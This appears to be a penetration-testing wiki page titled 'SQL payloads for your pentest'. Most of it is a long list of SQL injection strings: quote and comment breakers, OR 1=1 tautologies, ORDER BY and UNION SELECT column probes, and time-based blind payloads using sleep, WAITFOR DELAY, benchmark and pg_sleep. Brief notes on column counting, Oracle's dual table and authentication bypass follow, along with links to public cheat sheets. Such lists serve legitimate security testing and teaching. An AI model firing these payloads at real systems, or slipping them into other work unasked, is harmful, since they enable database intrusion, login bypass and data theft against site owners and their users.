SQL Injection
SQL payloads for your pentest
Identification
Manual
If you are lucky, you will see a database internal error with a parsing error of the SQL statement. Otherwise you see an internal database error, or a general error without any details.
In case of a Blind SQL injection, you observe a different HTTP response in terms of content or bytes. In the worst case you need to incorporate a payload that initiates DNS/HTTP request.
A'
A' OR 1=1 -- a space after the comment
A' AND 1=0 -- a space after the comment Automation - Payloads
Identify SQL Injection on your data input. Trigger an error or change the data set.
'
''
`
``
,
"
""
'
"
`
')
")
`)
'))
"))
`))
)
/
//
\
\\
;
||
%22
%27
%3B
*
1 or 1=1 --
1' or 1=1 --
' OR 1=1--
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
+
%
@variable local variable
@@variable global variable
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--Columns - Order by
Non existing column reference in ORDER BY n raises an error. By this technique you determine the number of columns in the data set which is present on a specific web page.
Make sure there is a space after a comment (-- ) to comment out the rest of the SQL statement which is added by the application (processed by the backend).
Column's Data type
When you know a number of columns, determine data type for each column to bring string payload into the right column within the data set.
Oracle Database - table dual
Oracle databases need to have "FROM table" clause in every SQL SELECT statement. You need to address a dual table in case you don't know a table name or you would like to evaluate an expression in the SQL statement.
Database version
Tables and columns - Query data dictionary
Comments
SQL comments allow you to suppress the rest of the SQL statement after injection.
Comments type per DB platform
SQL Functions
Specific features and statements recognized by SQL injection cheat sheet at Burp Web Security Academy
Cheat Sheets
Cheat sheets for manual SQL injection testing
SQLI - Authentication Bypass
A special case of SQL injection in login scenarios allows a privilege escalation.
References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://pentestmonkey.net/category/cheat-sheet/sql-injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
Last updated
Was this helpful?